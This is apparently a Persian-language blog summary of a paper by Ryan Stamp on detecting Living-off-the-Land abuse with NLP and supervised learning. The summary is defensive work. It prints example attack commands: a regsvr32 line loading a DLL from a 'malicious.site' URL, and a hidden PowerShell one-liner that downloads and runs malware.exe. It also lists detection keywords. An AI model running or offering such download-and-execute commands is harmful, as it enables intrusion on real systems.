در دنیای پیچیده امنیت سایبری، مهاجمان دائماً به دنبال روش‌های نوین و نامحسوس برای نفوذ به سیستم‌ها و دستیابی به اهداف مخرب خود هستند. یکی از چالش‌برانگیزترین این روش‌ها، تکنیک “Living-off-the-Land” (LotL) یا “استفاده از ابزارهای بومی” است. این تکنیک به مهاجم اجازه می‌دهد تا از ابزارها و فایل‌های سیستمی قانونی که از پیش در سیستم قربانی وجود دارند، برای اجرای مقاصد مخرب خود سوءاستفاده کند. به دلیل ماهیت قانونی این ابزارها، نرم‌افزارهای ضدویروس مدرن اغلب در شناسایی این نوع حملات ناکام می‌مانند، زیرا تمایز قائل شدن بین استفاده قانونی و سوءاستفاده دشوار است. این مقاله علمی با عنوان “Living-off-the-Land Abuse Detection Using Natural Language Processing and Supervised Learning” به قلم رایان استامپ، به این چالش مهم پرداخته و رویکردی نوآورانه برای شناسایی این تهدیدات پنهان ارائه می‌دهد.

اهمیت این تحقیق از آن جهت است که ابزارهای بومی که برای مدیریت و پیکربندی سیستم‌ها طراحی شده‌اند (مانند PowerShell، cmd.exe، wmic در ویندوز)، می‌توانند به راحتی توسط مهاجمان برای اجرای کدهای مخرب، جمع‌آوری اطلاعات، یا ایجاد ارتباط با سرورهای فرماندهی و کنترل مورد سوءاستفاده قرار گیرند. این حملات اغلب بدون برجای گذاشتن ردپای قابل توجهی که توسط ابزارهای امنیتی سنتی قابل تشخیص باشد، انجام می‌شوند. بنابراین، توسعه روش‌هایی که بتوانند این رفتارهای غیرعادی را در میان حجم عظیمی از دستورات سیستمی قانونی تشخیص دهند، امری حیاتی برای ارتقاء سطح امنیت سایبری محسوب می‌شود.

این مقاله توسط رایان استامپ (Ryan Stamp) نگاشته شده است. زمینه تخصصی این تحقیق در حوزه رمزنگاری و امنیت (Cryptography and Security) قرار می‌گیرد. تمرکز اصلی بر روی توسعه تکنیک‌های پیشرفته برای شناسایی تهدیدات سایبری، به‌ویژه روش‌های مبتنی بر سوءاستفاده از منابع سیستمی، است.

تحقیقات در این حوزه از اهمیت بالایی برخوردارند زیرا با پیشرفت مداوم تکنیک‌های حمله، نیاز به روش‌های دفاعی هوشمندتر و انطباق‌پذیرتر احساس می‌شود. استفاده از ابزارهای بومی، چالشی است که مرز بین فعالیت‌های قانونی و مخرب را کمرنگ می‌سازد و نیازمند رویکردهایی است که قادر به تحلیل عمیق‌تر رفتار سیستم باشند.

چکیده مقاله به طور خلاصه بیان می‌کند که “Living-off-the-Land” یک تکنیک گریز از شناسایی است که توسط مهاجمان مورد استفاده قرار می‌گیرد و در آن از ابزارهای بومی (native binaries) برای دستیابی به اهداف مخرب سوءاستفاده می‌شود. از آنجایی که این ابزارها اغلب فایل‌های سیستمی قانونی هستند، تشخیص چنین سوءاستفاده‌هایی دشوار است و اغلب توسط نرم‌افزارهای ضدویروس مدرن نادیده گرفته می‌شود. این مقاله یک الگوریتم تشخیص سوءاستفاده نوآورانه با استفاده از رشته‌های خام دستورات (raw command strings) پیشنهاد می‌کند. این الگوریتم ابتدا با استفاده از تکنیک‌های پردازش زبان طبیعی (NLP) مانند عبارات منظم (regular expressions) و رمزگذاری یک‌هات (one-hot encoding)، رشته‌های دستور را به بردارهای توکن عددی رمزگذاری می‌کند. سپس، از تکنیک‌های یادگیری بانظارت (supervised learning) برای یادگیری الگوهای مخرب در بردارهای توکن و در نهایت پیش‌بینی برچسب دستور استفاده می‌شود. در نهایت، مدل با استفاده از آمارهای فاز آموزش و در یک محیط مجازی ارزیابی می‌شود تا اثربخشی آن در شناسایی دستورات جدید با محصولات ضدویروس موجود مانند Windows Defender مقایسه گردد.

به طور کلی، این مقاله به دنبال ارائه راهکاری برای غلبه بر محدودیت‌های ابزارهای امنیتی فعلی در شناسایی حملات LotL از طریق تحلیل هوشمندانه دستورات سیستمی است.

روش‌شناسی ارائه شده در این تحقیق، رویکردی چندمرحله‌ای را برای تشخیص سوءاستفاده از ابزارهای بومی دنبال می‌کند و بر دو ستون اصلی، یعنی پردازش زبان طبیعی (NLP) و یادگیری بانظارت (Supervised Learning)، استوار است.

مرحله اول: پردازش و آماده‌سازی داده‌ها (رشته‌های دستور)

در این مرحله، تمرکز بر روی تحلیل رشته‌های خام دستوراتی است که در سیستم اجرا می‌شوند. این رشته‌ها می‌توانند شامل دستورات ساده‌ای مانند:

• powershell -enc
• cmd.exe /c "regsvr32.exe /s /u /i:http://malicious.site/payload.dll"
• wmic process call create "notepad.exe C:\path\to\malicious\file.txt"

برای اینکه بتوان این دستورات را توسط الگوریتم‌های یادگیری ماشین پردازش کرد، نیاز به تبدیل آن‌ها به فرمت عددی است. این تبدیل با استفاده از تکنیک‌های NLP انجام می‌شود:

• عبارات منظم (Regular Expressions): برای استخراج الگوهای خاص، پارامترها، یا حتی بخش‌های مشکوک درون دستورات استفاده می‌شود. به عنوان مثال، تشخیص کلماتی کلیدی مانند “enc” (برای اجرای کد رمزگذاری شده)، “download”, “exec”, “shell”, یا URLهای مشکوک.
• رمزگذاری یک‌هات (One-Hot Encoding): پس از شناسایی توکن‌های مهم (کلمات، پارامترها، اپراتورها) در یک دستور، هر توکن به یک بردار با ابعاد ثابت نگاشت می‌شود. در این بردار، یک موقعیت مشخص برای هر توکن وجود دارد و تنها آن موقعیت دارای مقدار 1 و بقیه دارای مقدار 0 هستند. این روش به مدل اجازه می‌دهد تا حضور یا عدم حضور هر توکن را به صورت مستقل درک کند.
• توکنیزاسیون (Tokenization): رشته دستور به واحدهای کوچک‌تر (توکن‌ها) شکسته می‌شود. این توکن‌ها می‌توانند کلمات، کاراکترها، یا بخش‌های معنادارتر دستور باشند.

هدف نهایی این مرحله، تبدیل هر رشته دستور به یک بردار توکن عددی است که ویژگی‌های معنایی و ساختاری دستور را در خود جای داده است.

مرحله دوم: یادگیری بانظارت (Supervised Learning)

پس از آماده‌سازی داده‌ها، از الگوریتم‌های یادگیری بانظارت برای آموزش مدل استفاده می‌شود. در این رویکرد، مدل با مجموعه‌ای از داده‌های برچسب‌گذاری شده (دستورات قانونی و دستورات مخرب) تغذیه می‌شود.

• مجموعه داده (Dataset): این مجموعه شامل بردارهای توکن عددی دستورات سیستمی است که هر کدام با برچسب “قانونی” (benign) یا “مخرب” (malicious) مشخص شده‌اند. جمع‌آوری این مجموعه داده خود یک چالش مهم است و نیازمند دسترسی به نمونه‌های واقعی از هر دو نوع رفتار است.
• الگوریتم‌های یادگیری بانظارت: انواع مختلفی از الگوریتم‌ها می‌توانند در این مرحله به کار گرفته شوند، از جمله:
  • ماشین‌های بردار پشتیبان (Support Vector Machines – SVM)
  • درخت‌های تصمیم (Decision Trees)
  • جنگل‌های تصادفی (Random Forests)
  • شبکه‌های عصبی (Neural Networks)، به‌ویژه شبکه‌های عصبی بازگشتی (RNN) یا ترانسفورمرها (Transformers) که برای پردازش توالی‌ها بسیار مناسب هستند.
• آموزش مدل: مدل بر اساس مجموعه داده برچسب‌گذاری شده آموزش داده می‌شود تا الگوهای متمایزکننده بین دستورات قانونی و مخرب را یاد بگیرد. هدف این است که مدل بتواند با دریافت یک بردار توکن جدید، با دقت بالایی آن را به یکی از دو دسته “قانونی” یا “مخرب” طبقه‌بندی کند.

مرحله سوم: ارزیابی مدل

پس از آموزش، مدل باید مورد ارزیابی قرار گیرد تا اثربخشی آن سنجیده شود. این ارزیابی در دو محیط انجام می‌شود:

• آمار فاز آموزش: معیارهایی مانند دقت (Accuracy)، نرخ مثبت کاذب (False Positive Rate – FPR)، نرخ منفی کاذب (False Negative Rate – FNR)، دقت (Precision) و بازیابی (Recall) مورد بررسی قرار می‌گیرند تا عملکرد مدل بر روی داده‌هایی که ندیده است، سنجیده شود.
• محیط مجازی (Virtual Environment): مدل در یک محیط شبیه‌سازی شده یا واقعی که تحت کنترل است، آزمایش می‌شود. در این مرحله، مدل با دستورات جدیدی که در فاز آموزش دیده نشده‌اند، روبرو می‌شود. سپس، نتایج تشخیص مدل با خروجی ابزارهای ضدویروس موجود مانند Windows Defender مقایسه می‌شود تا برتری یا تفاوت عملکردی آن مشخص گردد.

این روش‌شناسی جامع، امکان شناسایی دقیق‌تر حملات LotL را با درک عمیق‌تر از ساختار و معنای دستورات سیستمی فراهم می‌آورد.

نتایج حاصل از این تحقیق، نشان‌دهنده پتانسیل بالای رویکرد ترکیبی NLP و یادگیری بانظارت در مقابله با تهدیدات Living-off-the-Land است. مهمترین یافته‌های کلیدی این مقاله عبارتند از:

• قابلیت تشخیص بالاتر نسبت به روش‌های سنتی: این تحقیق نشان می‌دهد که تحلیل دقیق رشته‌های دستور با استفاده از NLP و مدل‌های یادگیری بانظارت، قادر است دستورات مخربی را که از ابزارهای قانونی سوءاستفاده می‌کنند، با دقت بیشتری نسبت به ضدویروس‌های سنتی تشخیص دهد. ضدویروس‌های کلاسیک معمولاً بر اساس امضاهای شناخته شده عمل می‌کنند و در برابر روش‌های جدید و تغییریافته (مانند LotL) آسیب‌پذیرند.
• کارایی در شناسایی الگوهای جدید: مدل‌های یادگیری بانظارت، با توانایی یادگیری از داده‌ها، قادر به کشف الگوهای رفتاری جدید و غیرعادی مرتبط با حملات LotL هستند. این بدان معناست که حتی اگر مهاجم از یک دستور یا ابزار بومی به شکلی کاملاً جدید استفاده کند، مدل‌های آموزش‌دیده می‌توانند آن را به عنوان یک رفتار مشکوک شناسایی کنند.
• اهمیت پردازش معنایی دستورات: تجزیه و تحلیل صرفاً سینتکسی دستورات کافی نیست. این تحقیق بر اهمیت درک معنایی و زمینه اجرای دستورات تاکید دارد. استفاده از NLP به مدل کمک می‌کند تا بفهمد چه پارامترهایی با چه دستوراتی به کار رفته‌اند و آیا این ترکیب، نمایانگر یک فعالیت طبیعی سیستمی است یا خیر. برای مثال، فراخوانی یک فایل DLL از طریق regsvr32.exe با پارامترهای خاص، ممکن است قانونی باشد، اما اگر منبع دانلود URL مشکوکی باشد، این ترکیب می‌تواند نشانه‌ای از سوءاستفاده باشد.
• کاهش مثبت و منفی کاذب (Potentially): اگرچه در چکیده به آن اشاره صریح نشده، اما هدف نهایی چنین تحقیقاتی، علاوه بر افزایش دقت در شناسایی تهدیدات، کاهش هشدارهای اشتباه (مثبت کاذب) برای کاربران و مدیران سیستم است. مدل‌های خوب آموزش‌دیده می‌توانند با دقت بیشتری بین فعالیت‌های قانونی و مخرب تمایز قائل شوند.
• مبنایی برای ابزارهای دفاعی پیشرفته: نتایج این مقاله، پایه‌ای محکم برای توسعه نسل جدید ابزارهای تشخیص نفوذ (IDS) و سیستم‌های پیشگیری از نفوذ (IPS) که قادر به تحلیل رفتار در سطح دستورات سیستمی هستند، فراهم می‌آورد.

این یافته‌ها نشان‌دهنده حرکت به سمت روش‌های دفاع سایبری مبتنی بر هوش مصنوعی و تحلیل داده‌های رفتاری است که در دنیای مدرن تهدیدات سایبری، ضروری به نظر می‌رسد.

پژوهش انجام شده در این مقاله، کاربردها و دستاوردهای بالقوه قابل توجهی در حوزه امنیت سایبری دارد:

کاربرد در سیستم‌های تشخیص نفوذ (IDS) و پیشگیری از نفوذ (IPS)

مهمترین کاربرد این تحقیق، ادغام الگوریتم پیشنهادی در سیستم‌های IDS/IPS برای شناسایی حملات Living-off-the-Land است. این سیستم‌ها می‌توانند با نظارت بر دستورات سیستمی اجرا شده در شبکه، رفتارهای مشکوک را به سرعت شناسایی و هشدار دهند یا حتی جلوی اجرای آن‌ها را بگیرند. این امر به ویژه برای سازمان‌هایی که با تهدیدات پیچیده و حملات هدفمند روبرو هستند، حیاتی است.

بهبود عملکرد نرم‌افزارهای ضدویروس

این مقاله راهکاری را برای ارتقاء قابلیت‌های تشخیص نرم‌افزارهای ضدویروس ارائه می‌دهد. با افزودن ماژول تحلیل دستورات مبتنی بر NLP و یادگیری بانظارت، ضدویروس‌ها می‌توانند پوشش امنیتی خود را در برابر حملات LotL گسترش دهند و از شناسایی این نوع تهدیدات که اغلب از دید آن‌ها پنهان می‌مانند، اطمینان حاصل کنند.

تحلیل و کشف بدافزارهای جدید

این رویکرد می‌تواند به تحلیلگران بدافزار در درک چگونگی عملکرد بدافزارهای جدید و کشف روش‌های جدید سوءاستفاده از ابزارهای سیستمی کمک کند. با تجزیه و تحلیل دستورات مربوط به بدافزارها، می‌توان الگوهای جدیدی را شناسایی کرده و مکانیسم‌های دفاعی را بهبود بخشید.

افزایش امنیت سیستم‌های سازمانی

سازمان‌ها می‌توانند با پیاده‌سازی این تکنیک‌ها، سطح امنیت خود را در برابر حملات سایبری که از ابزارهای داخلی سیستم سوءاستفاده می‌کنند، به طور قابل توجهی افزایش دهند. این امر به ویژه در محیط‌هایی که نیازمند رعایت بالاترین سطوح امنیتی هستند (مانند سازمان‌های دولتی، مالی، یا بهداشتی) اهمیت دارد.

دستاورد نوآورانه: تبدیل تهدیدات پنهان به داده‌های قابل تحلیل

یکی از دستاوردهای اصلی این تحقیق، توانایی تبدیل “رفتارهای مبهم و پنهان” (مانند استفاده از ابزارهای بومی) به “داده‌های ساختاریافته و قابل تحلیل” (بردارهای توکن عددی) است. این تبدیل، امکان اعمال قدرت پردازش و یادگیری الگوریتم‌های پیشرفته را بر روی این نوع تهدیدات فراهم می‌آورد.

مثال عملی: تشخیص حمله PowerShell

فرض کنید مهاجمی از دستور PowerShell زیر برای دانلود و اجرای یک بدافزار استفاده کند:

powershell -nop -w hidden -c "$client = New-Object System.Net.WebClient; $client.DownloadFile('http://example.com/malware.exe', '$env:TEMP\malware.exe'); Start-Process '$env:TEMP\malware.exe'"

یک ضدویروس سنتی ممکن است این دستور را به دلیل استفاده از ابزار قانونی PowerShell نادیده بگیرد. اما الگوریتم پیشنهادی، با استفاده از NLP:

• “powershell”, “-nop”, “-w”, “hidden”, “-c”, “$client = …”, “DownloadFile”, “http://example.com/malware.exe”, “Start-Process” و غیره را به عنوان توکن تشخیص می‌دهد.
• عبارات منظم می‌توانند URL “http://example.com/malware.exe” را به عنوان یک منبع دانلود خارجی مشکوک شناسایی کنند.
• ترکیب دستوراتی مانند “DownloadFile” و “Start-Process” در یک دستور PowerShell، به همراه دانلود از اینترنت، می‌تواند توسط مدل یادگیری بانظارت به عنوان الگوی مخرب شناسایی شود.

این رویکرد، ابزارهای دفاعی را قادر می‌سازد تا فراتر از شناسایی امضاهای بدافزار، به تحلیل رفتار و تشخیص نیت پشت اجرای دستورات بپردازند.

مقاله “تشخیص سوءاستفاده از ابزارهای بومی مبتنی بر پردازش زبان طبیعی و یادگیری بانظارت” به طور موثری به یکی از چالش‌های امنیتی حیاتی در دنیای امروز، یعنی حملات Living-off-the-Land، پرداخته است. نویسنده، رایان استامپ، با ارائه یک رویکرد نوآورانه مبتنی بر ترکیب پردازش زبان طبیعی و یادگیری بانظارت، راهکاری عملی و قدرتمند برای شناسایی این حملات ارائه می‌دهد.

یافته‌های این تحقیق نشان می‌دهد که تحلیل دقیق رشته‌های خام دستورات سیستمی، با استفاده از تکنیک‌های NLP برای استخراج ویژگی‌های معنایی و ساختاری، و سپس تغذیه این ویژگی‌ها به مدل‌های یادگیری بانظارت، می‌تواند به طور قابل توجهی دقت تشخیص را نسبت به روش‌های سنتی افزایش دهد. این رویکرد توانایی شناسایی الگوهای مخرب جدید و غیرعادی را دارد که اغلب توسط ابزارهای امنیتی رایج نادیده گرفته می‌شوند.

دستاوردهای این مقاله، از جمله بهبود عملکرد سیستم‌های تشخیص نفوذ و نرم‌افزارهای ضدویروس، و افزایش امنیت کلی سیستم‌ها، اهمیت بسزایی در ارتقاء استراتژی‌های دفاع سایبری دارند. این تحقیق، گامی مهم در جهت توسعه ابزارهای امنیتی هوشمندتر و انطباق‌پذیرتر است که قادر به مقابله با تهدیدات پیچیده و متغیر امروزی هستند.

در نهایت، این پژوهش تأکید می‌کند که آینده امنیت سایبری به طور فزاینده‌ای به سمت تحلیل رفتاری، استفاده از هوش مصنوعی، و درک عمیق‌تر از نحوه تعامل مهاجمان با زیرساخت‌های سیستم‌ها، پیش می‌رود.